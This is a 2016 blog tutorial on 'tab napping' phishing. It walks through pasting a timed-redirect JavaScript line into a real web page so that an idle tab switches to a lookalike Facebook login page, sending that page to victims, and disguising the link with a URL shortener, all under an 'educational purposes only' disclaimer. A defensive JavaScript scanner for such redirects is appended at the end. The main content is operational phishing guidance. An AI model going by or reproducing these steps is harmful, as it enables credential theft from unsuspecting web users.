Thursday, May 26, 2016

TAB NAPPING :: ADVANCED METHOD OF PHISHING WITH HELP OF A REDIRECTING JAVASCRIPT[TUT]






INTRODUCTION:

Tab napping is a new type of phishing scam that does not require you to click on any URL to redirect you to the phishing site. Instead, it relies on the fact that a lot of people use tabbed browsing (opening multiple tabs while browsing). In tab napping, one of your inactive tabs is automatically replaced with a new page without your knowledge. Tab napping is a type of phishing with a smarter way to confuse the victim. For example, the victim was viewing page A in a browser tab, then left it idle and is now using some other website in another tab. After some time, page A will automatically change to the phishing page. This is your phishing page. The idea is to confuse the victim among multiple browser tabs.


Now let's move on to the tutorial:
1. First we need a simple phishing setup that we have discussed before. You can get your phisher from here. Click here.
2. You will need your hosting/blog/or any web page in which you can put the JavaScript, to send its link to the victim.
3. Get your JavaScript from here.
4. Now replace the link with your phishing page link in the JavaScript, in this line, which comes in two places in the script:

timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect
5. After replacing it, select all and copy the tab napping script, then paste it at the end of the real page's HTML (that means above </html>).
6. This script will not make any change to your web page or blog page.
This script will track the user's actions, and as soon as the blog is left idle, the script will redirect the victim to your phishing page. Now send this blog address to your victim, or you can upload your malicious web page to a web host and then send the link to the victim.
7. For better results, you can shorten your URL so that the victim won't be able to know your intentions. Get any URL shortener from here.
HERE IS A DEMO OF A TAB NAPPING PAGE:
Just go HERE and wait; keep yourself idle for 10 seconds. You will be redirected to my phishing page. Note: This is illegal and is for educational purposes only. Any loss/damage happening will not be in any way our responsibility.
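
From the defender's side, the timed `location.href` assignment in step 4 is the signature to look for when reviewing a page's markup. The scanner below is an added example, not part of the original post or the script it links to; the name `findTimedRedirects`, the sample markup and the `*.example` hosts are constructed for illustration.

```javascript
// Heuristic static check for the tab-napping pattern described above:
// a setInterval/setTimeout whose callback navigates the page elsewhere.
// Function name and sample data are constructed for this example.
const TIMER_RE = /\bset(?:Interval|Timeout)\s*\(([\s\S]{0,400}?),\s*(\d+)\s*\)/g;
const NAV_RE = new RegExp(
  "\\b(?:(?:window|document|top|self)\\.)?location(?:\\.href)?\\s*=\\s*['\"]([^'\"]+)" +
  "|\\blocation\\.(?:replace|assign)\\s*\\(\\s*['\"]([^'\"]+)");

function findTimedRedirects(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const m of html.matchAll(TIMER_RE)) {
    const nav = NAV_RE.exec(m[1]);      // m[1] is the timer's callback text
    if (!nav) continue;                 // timer does something other than navigate
    let target;
    try {
      target = new URL(nav[1] || nav[2], pageUrl); // resolve relative targets
    } catch {
      continue;                         // not a parseable URL literal
    }
    findings.push({
      target: target.href,
      delayMs: Number(m[2]),
      crossOrigin: target.origin !== pageOrigin, // off-site jump is the red flag
    });
  }
  return findings;
}

// Constructed sample page: one cross-origin timed redirect, one harmless
// timer, and one same-origin timed navigation.
const SAMPLE_HTML = `
<html><body><h1>Blog post</h1>
<script>
  var timerRedirect = setInterval("location.href='http://login.phish.example/index.html'", 10000);
  setTimeout(function () { document.title = "still here"; }, 3000);
  setTimeout(function () { window.location.replace("/next-page"); }, 5000);
</script>
</body></html>`;

for (const f of findTimedRedirects(SAMPLE_HTML, "https://blog.example/post.html")) {
  console.log(`${f.crossOrigin ? "ALERT" : "info "} ${f.delayMs} ms -> ${f.target}`);
}
```

Pattern matching of this kind only catches literal URL targets; scripts that build the destination at run time need to be checked by observing navigation in a browser instead.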
